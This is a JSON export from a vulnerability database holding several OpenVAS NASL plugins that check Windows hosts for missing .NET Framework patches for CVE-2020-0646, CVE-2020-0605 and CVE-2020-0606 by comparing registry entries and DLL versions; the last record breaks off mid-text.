{"id": "OPENVAS:1361412562310815897", "type": "openvas", "bulletinFamily": "scanner", "title": "Microsoft .NET Framework Multiple RCE Vulnerabilities (KB4532936", "description": "This host is missing a critical security\n update according to Microsoft KB4532936", "published": "2020-01-15T00:00:00", "modified": "2020-06-04T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815897", "reporter": "Copyright (C) 2020 Greenbone Networks GmbH", "references": ["https://support.microsoft.com/en-us/help/4532936"], "cvelist": ["CVE-2020-0646", "CVE-2020-0606", "CVE-2020-0605"], "lastseen": "2020-06-05T15:41:52", "viewCount": 31, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:2A3F116D-DC02-4BEA-B9AD-39F7773274AE", "AKB:5635A082-A142-45A9-A677-DAB47F32BD83"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-0216", "CPAI-2020-1031"]}, {"type": "cve", "idList": ["CVE-2020-0605", "CVE-2020-0606", "CVE-2020-0646"]}, {"type": "exploitdb", "idList": ["EDB-ID:48275"]}, {"type": "kaspersky", "idList": ["KLA11634"]}, {"type": "kitploit", "idList": ["KITPLOIT:4480301396595295532"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/HTTP/SHAREPOINT_WORKFLOWS_XOML/"]}, {"type": "mscve", "idList": ["MS:CVE-2020-0605", "MS:CVE-2020-0606", "MS:CVE-2020-0646"]}, {"type": "mskb", "idList": ["KB4532933", "KB4532934", "KB4532935", "KB4532936", "KB4532938", "KB4534976", "KB4534977", "KB4534978", "KB4534979", "KB4535101", "KB4535102", "KB4535103", "KB4535104", "KB4535105", "KB4552925", "KB4552926", "KB4552927", "KB4552928", "KB4552929", "KB4552931", "KB4556399", "KB4556400", "KB4556401", "KB4556402", "KB4556403", "KB4556404", "KB4556405", "KB4556406", "KB4556441"]}, {"type": "nessus", "idList": ["SMB_NT_MS20_JAN_4528760.NASL", "SMB_NT_MS20_JAN_4534271.NASL", "SMB_NT_MS20_JAN_4534273.NASL", "SMB_NT_MS20_JAN_4534276.NASL", "SMB_NT_MS20_JAN_4534283.NASL", "SMB_NT_MS20_JAN_4534293.NASL", "SMB_NT_MS20_JAN_4534303.NASL", "SMB_NT_MS20_JAN_4534306.NASL", "SMB_NT_MS20_JAN_4534310.NASL", "SMB_NT_MS20_JAN_DOTNET.NASL", "SMB_NT_MS20_JAN_DOTNET_CORE.NASL", "SMB_NT_MS20_JAN_DOTNET_CORE_SDK.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310815740", "OPENVAS:1361412562310815742", "OPENVAS:1361412562310815744", "OPENVAS:1361412562310815745", "OPENVAS:1361412562310815894", "OPENVAS:1361412562310815895", "OPENVAS:1361412562310815898", "OPENVAS:1361412562310816552", "OPENVAS:1361412562310816553", "OPENVAS:1361412562310816556", "OPENVAS:1361412562310816557", "OPENVAS:1361412562310817100", "OPENVAS:1361412562310817103", "OPENVAS:1361412562310817104", "OPENVAS:1361412562310817106", "OPENVAS:1361412562310817116"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156930"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3"]}, {"type": "redhatcve", "idList": ["RH:CVE-2020-0605", "RH:CVE-2020-0606"]}, {"type": "symantec", "idList": ["SMNTC-111378", "SMNTC-111384", "SMNTC-111386"]}, {"type": "talosblog", "idList": ["TALOSBLOG:6A8FEAE9B7E20A5AA1A11907296891AF"]}, {"type": "zdt", "idList": ["1337DAY-ID-34152"]}]}, "score": {"value": 6.3, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:2A3F116D-DC02-4BEA-B9AD-39F7773274AE", "AKB:5635A082-A142-45A9-A677-DAB47F32BD83"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-0216", "CPAI-2020-1031"]}, {"type": "cve", "idList": ["CVE-2020-0605", "CVE-2020-0606", "CVE-2020-0646"]}, {"type": "exploitdb", "idList": ["EDB-ID:48275"]}, {"type": "kaspersky", "idList": ["KLA11634"]}, {"type": "kitploit", "idList": ["KITPLOIT:4480301396595295532"]}, {"type": "mscve", "idList": ["MS:CVE-2020-0605", "MS:CVE-2020-0646"]}, {"type": "mskb", "idList": ["KB4532934", "KB4532935", "KB4534978", "KB4535102", "KB4535104"]}, {"type": "nessus", "idList": ["SMB_NT_MS20_JAN_4528760.NASL", "SMB_NT_MS20_JAN_4534271.NASL", "SMB_NT_MS20_JAN_4534273.NASL", "SMB_NT_MS20_JAN_4534276.NASL", "SMB_NT_MS20_JAN_4534283.NASL", "SMB_NT_MS20_JAN_4534293.NASL", "SMB_NT_MS20_JAN_4534303.NASL", "SMB_NT_MS20_JAN_4534306.NASL", "SMB_NT_MS20_JAN_4534310.NASL", "SMB_NT_MS20_JAN_DOTNET.NASL", "SMB_NT_MS20_JAN_DOTNET_CORE.NASL", "SMB_NT_MS20_JAN_DOTNET_CORE_SDK.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310815740", "OPENVAS:1361412562310815742", "OPENVAS:1361412562310815744", "OPENVAS:1361412562310815745", "OPENVAS:1361412562310815894", "OPENVAS:1361412562310815895", "OPENVAS:1361412562310815898", "OPENVAS:1361412562310816552", "OPENVAS:1361412562310816553", "OPENVAS:1361412562310816556", "OPENVAS:1361412562310816557"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156930"]}, {"type": "redhatcve", "idList": ["RH:CVE-2020-0605", "RH:CVE-2020-0606"]}, {"type": "symantec", "idList": ["SMNTC-111386"]}, {"type": "talosblog", "idList": ["TALOSBLOG:6A8FEAE9B7E20A5AA1A11907296891AF"]}, {"type": "zdt", "idList": ["1337DAY-ID-34152"]}]}, "exploitation": null, "vulnersScore": 6.3}, "pluginID": "1361412562310815897", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815897\");\n script_version(\"2020-06-04T08:47:11+0000\");\n script_cve_id(\"CVE-2020-0646\", \"CVE-2020-0605\", \"CVE-2020-0606\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 08:47:11 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-15 10:11:12 +0530 (Wed, 15 Jan 2020)\");\n script_name(\"Microsoft .NET Framework Multiple RCE Vulnerabilities (KB4532936\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4532936\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Microsoft .NET Framework fails to check the source markup of a file.\n\n - Microsoft .NET Framework fails to validate input properly.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code in the context of the current user. If the current user\n is logged on with administrative user rights, an attacker could take control of\n the affected system.\");\n\n script_tag(name:\"affected\", value:\"Microsoft .NET Framework 4.8 on Microsoft Windows 10 Version 1803.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4532936\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(edgeVer =~ \"^11\\.0\\.17134\")\n{\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\.NETFramework\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\ASP.NET\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\\\")){\n exit(0);\n }\n }\n }\n\n key_list = make_list(\"SOFTWARE\\Microsoft\\.NETFramework\\\", \"SOFTWARE\\Microsoft\\ASP.NET\\\", \"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\\\");\n\n foreach key(key_list)\n {\n if(\".NETFramework\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n NetPath = registry_get_sz(key:key + item, item:\"InstallRoot\");\n if(NetPath && \"\\Microsoft.NET\\Framework\" >< NetPath)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = NetPath + item;\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4532936\n if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\"))\n {\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n break;\n }\n }\n }\n }\n }\n }\n\n if((!vulnerable_range) && \"ASP.NET\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = registry_get_sz(key:key + item, item:\"Path\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4532936\n if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\"))\n {\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n break;\n }\n }\n }\n }\n }\n\n ## For versions greater than 4.5 (https://docs.microsoft.com/en-us/dotnet/framework/migration-guide/how-to-determine-which-versions-are-installed#net_b)\n if((!vulnerable_range) && \"NET Framework Setup\" >< key)\n {\n dotPath = registry_get_sz(key:key, item:\"InstallPath\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4532936\n if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\")){\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n }\n }\n }\n }\n\n if(vulnerable_range)\n {\n report = report_fixed_ver(file_checked:dotPath + \"System.workflow.runtime.dll\",\n file_version:dllVer, vulnerable_range:vulnerable_range);\n security_message(data:report);\n exit(0);\n }\n }\n}\nexit(99);\n", "naslFamily": "Windows : Microsoft Bulletins", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647589307, "score": 0}}
{"openvas": [{"lastseen": "2020-06-05T15:41:58", "description": "This host is missing an important security\n update according to Microsoft KB4535101", "cvss3": {}, "published": "2020-01-15T00:00:00", "type": "openvas", "title": "Microsoft .NET Framework Multiple RCE Vulnerabilities (KB4535101", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0646", "CVE-2020-0606", "CVE-2020-0605"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310815898", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815898", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815898\");\n script_version(\"2020-06-04T08:47:11+0000\");\n script_cve_id(\"CVE-2020-0646\", \"CVE-2020-0605\", \"CVE-2020-0606\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 08:47:11 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-15 10:11:12 +0530 (Wed, 15 Jan 2020)\");\n script_name(\"Microsoft .NET Framework Multiple RCE Vulnerabilities (KB4535101\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft KB4535101\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - Microsoft .NET Framework fails to check the source markup of a file.\n\n - Microsoft .NET Framework fails to validate input properly.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code in the context of the current user. If the current user\n is logged on with administrative user rights, an attacker could take control of\n the affected system.\");\n\n script_tag(name:\"affected\", value:\"Microsoft .NET Framework 3.5, 4.7.2 and 4.8 on Microsoft Windows 10 version 1809 and Microsoft Windows Server 2019.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4535101\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n\nif(hotfix_check_sp(win10:1, win10x64:1, win2019:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(edgeVer =~ \"^11\\.0\\.17763\")\n{\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\.NETFramework\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\ASP.NET\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\\\")){\n exit(0);\n }\n }\n }\n\n key_list = make_list(\"SOFTWARE\\Microsoft\\.NETFramework\\\", \"SOFTWARE\\Microsoft\\ASP.NET\\\", \"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\\\");\n\n foreach key(key_list)\n {\n if(\".NETFramework\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n NetPath = registry_get_sz(key:key + item, item:\"InstallRoot\");\n if(NetPath && \"\\Microsoft.NET\\Framework\" >< NetPath)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = NetPath + item;\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4535101\n ## https://support.microsoft.com/en-us/help/4532947\n ## https://support.microsoft.com/en-us/help/4532937\n if(version_in_range(version:dllVer, test_version:\"3.0\", test_version2:\"3.0.4203.9042\"))\n {\n vulnerable_range = \"3.0 - 3.0.4203.9042\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.7\", test_version2:\"4.7.3569\"))\n {\n vulnerable_range = \"4.7 - 4.7.3569\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\"))\n {\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n break;\n }\n }\n }\n }\n }\n }\n\n if((!vulnerable_range) && \"ASP.NET\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = registry_get_sz(key:key + item, item:\"Path\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4535101\n ## https://support.microsoft.com/en-us/help/4532947\n ## https://support.microsoft.com/en-us/help/4532937\n if(version_in_range(version:dllVer, test_version:\"3.0\", test_version2:\"3.0.4203.9042\"))\n {\n vulnerable_range = \"3.0 - 3.0.4203.9042\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.7\", test_version2:\"4.7.3569\"))\n {\n vulnerable_range = \"4.7 - 4.7.3569\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\"))\n {\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n break;\n }\n }\n }\n }\n }\n\n ## For versions greater than 4.5 (https://docs.microsoft.com/en-us/dotnet/framework/migration-guide/how-to-determine-which-versions-are-installed#net_b)\n if((!vulnerable_range) && \"NET Framework Setup\" >< key)\n {\n dotPath = registry_get_sz(key:key, item:\"InstallPath\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4532936\n if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\"))\n {\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.7\", test_version2:\"4.7.3569\"))\n {\n vulnerable_range = \"4.7 - 4.7.3569\" ;\n }\n }\n }\n }\n\n if(vulnerable_range)\n {\n report = report_fixed_ver(file_checked:dotPath + \"System.workflow.runtime.dll\",\n file_version:dllVer, vulnerable_range:vulnerable_range);\n security_message(data:report);\n exit(0);\n }\n }\n}\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-05T15:41:56", "description": "This host is missing a critical security\n update according to Microsoft KB4535104", "cvss3": {}, "published": "2020-01-16T00:00:00", "type": "openvas", "title": "Microsoft .NET Framework Multiple RCE Vulnerabilities (KB4535104)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0646", "CVE-2020-0606", "CVE-2020-0605"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310816553", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310816553", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.816553\");\n script_version(\"2020-06-04T08:47:11+0000\");\n script_cve_id(\"CVE-2020-0646\", \"CVE-2020-0605\", \"CVE-2020-0606\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 08:47:11 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-16 11:32:54 +0530 (Thu, 16 Jan 2020)\");\n script_name(\"Microsoft .NET Framework Multiple RCE Vulnerabilities (KB4535104)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4535104\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Microsoft .NET Framework fails to check the source markup of a file.\n\n - Microsoft .NET Framework fails to validate input properly.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code in the context of the current user. If the current user\n is logged on with administrative user rights, an attacker could take control of\n the affected system.\");\n\n script_tag(name:\"affected\", value:\"Microsoft .NET Framework 3.5, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, 4.8 for Microsoft Windows 8.1 and Microsoft Windows Server 2012 R2.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4535104\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) <= 0){\n exit(0);\n}\n\nif(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\.NETFramework\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\ASP.NET\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\\\")){\n exit(0);\n }\n }\n}\n\nkey_list = make_list(\"SOFTWARE\\Microsoft\\.NETFramework\\\", \"SOFTWARE\\Microsoft\\ASP.NET\\\", \"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\\\");\n\nforeach key(key_list)\n{\n if(\".NETFramework\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n NetPath = registry_get_sz(key:key + item, item:\"InstallRoot\");\n if(NetPath && \"\\Microsoft.NET\\Framework\" >< NetPath)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = NetPath + item;\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4532946\n ## https://support.microsoft.com/en-us/help/4532927\n ## https://support.microsoft.com/en-us/help/4532931\n ## https://support.microsoft.com/en-us/help/4532940\n if(version_in_range(version:dllVer, test_version:\"3.0\", test_version2:\"3.0.4203.8832\"))\n {\n vulnerable_range = \"3.0 - 3.0.4203.8832\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.0\", test_version2:\"4.0.30319.36576\"))\n {\n vulnerable_range = \"4.0 - 4.0.30319.36576\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.6\", test_version2:\"4.7.3569\"))\n {\n vulnerable_range = \"4.6 - 4.7.3569\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\"))\n {\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n break;\n }\n }\n }\n }\n }\n }\n if((!vulnerable_range) && \"ASP.NET\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = registry_get_sz(key:key + item, item:\"Path\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4532946\n ## https://support.microsoft.com/en-us/help/4532927\n ## https://support.microsoft.com/en-us/help/4532931\n ## https://support.microsoft.com/en-us/help/4532940\n if(version_in_range(version:dllVer, test_version:\"3.0\", test_version2:\"3.0.4203.8832\"))\n {\n vulnerable_range = \"3.0 - 3.0.4203.8832\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.0\", test_version2:\"4.0.30319.36576\"))\n {\n vulnerable_range = \"4.0 - 4.0.30319.36576\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.6\", test_version2:\"4.7.3569\"))\n {\n vulnerable_range = \"4.6 - 4.7.3569\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\"))\n {\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n break;\n }\n }\n }\n }\n }\n\n ## For versions greater than 4.5 (https://docs.microsoft.com/en-us/dotnet/framework/migration-guide/how-to-determine-which-versions-are-installed#net_b)\n if((!vulnerable_range) && \"NET Framework Setup\" >< key)\n {\n dotPath = registry_get_sz(key:key, item:\"InstallPath\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4532931\n ## https://support.microsoft.com/en-us/help/4532940\n if(version_in_range(version:dllVer, test_version:\"4.6\", test_version2:\"4.7.3569\"))\n {\n vulnerable_range = \"4.6 - 4.7.3569\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\"))\n {\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n break;\n }\n }\n }\n }\n\n if(vulnerable_range)\n {\n report = report_fixed_ver(file_checked:dotPath + \"System.workflow.runtime.dll\",\n file_version:dllVer, vulnerable_range:vulnerable_range);\n security_message(data:report);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-05T15:41:55", "description": "This host is missing a critical security\n update according to Microsoft KB4532935", "cvss3": {}, "published": "2020-01-15T00:00:00", "type": "openvas", "title": "Microsoft .NET Framework Multiple RCE Vulnerabilities (KB4532935)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0646", "CVE-2020-0606", "CVE-2020-0605"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310815895", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815895", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815895\");\n script_version(\"2020-06-04T08:47:11+0000\");\n script_cve_id(\"CVE-2020-0646\", \"CVE-2020-0605\", \"CVE-2020-0606\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 08:47:11 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-15 10:11:12 +0530 (Wed, 15 Jan 2020)\");\n script_name(\"Microsoft .NET Framework Multiple RCE Vulnerabilities (KB4532935)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4532935\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Microsoft .NET Framework fails to check the source markup of a 